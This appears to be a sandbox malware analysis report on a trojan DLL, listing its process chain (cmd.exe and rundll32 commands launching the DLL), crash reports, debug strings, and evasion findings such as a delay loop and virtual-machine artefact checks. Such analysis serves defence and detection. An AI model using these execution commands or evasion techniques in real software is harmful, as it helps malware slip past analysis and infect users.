Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\hMUh2Mkqyi.dll,Wgpomsdeeomtunmdrt

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\hMUh2Mkqyi.dll,Wgpomsdeeomtunmdrt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 740
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 892
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\hMUh2Mkqyi.dll,Wgpomsdeeomtunmdrt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3980
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4884

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERF56A.tmp

Jump to behavior

Source: classification engine

Classification label: mal80.troj.evad.winDLL@9/10@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: hMUh2Mkqyi.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: hMUh2Mkqyi.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: oleaut32.pdb! source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wininet.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: WinTypes.pdb source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.318527592.00000000049C5000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.321398387.000000000536D000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb9 source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: WinTypes.pdbd source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wininet.pdb: source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: ntdsapi.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000F.00000002.346110592.0000000000F42000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331350069.0000000005860000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.350582062.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331365387.0000000005865000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: winmm.pdb" source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb' source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: winmm.pdb# source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb3 source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdbk source: WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb- source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331350069.0000000005860000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331365387.0000000005865000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: WINMMBASE.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdbm source: WerFault.exe, 0000000F.00000003.331350069.0000000005860000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: ffty.pdbe source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: lz32.pdb, source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdbf source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: ffty.pdbn source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331365387.0000000005865000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.350582062.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: WINMMBASE.pdbn source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb/ source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: winmm.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb0 source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb6 source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: esent.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: pdh.pdb source: WerFault.exe, 0000000C.00000003.325584158.0000000005041000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb? source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: ffty.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp, hMUh2Mkqyi.dll
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331350069.0000000005860000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331365387.0000000005865000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331261588.0000000005862000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331350069.0000000005860000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000C.00000003.325529839.0000000005030000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331350069.0000000005860000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp
Source:	Binary string: lz32.pdb source: WerFault.exe, 0000000C.00000003.325553878.0000000005036000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331286786.0000000005868000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.331372420.0000000005868000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.325504064.0000000004E51000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.331170568.0000000005891000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ED8F6A8 push esi; mov dword ptr [esp], 00000000h

0_2_6ED8F6A9

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 957

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 957

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ED90730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

0_2_6ED90730

Source: Amcache.hve.12.dr	Binary or memory string: VMware
Source: Amcache.hve.12.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.12.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 0000000C.00000002.349941200.00000000049C0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
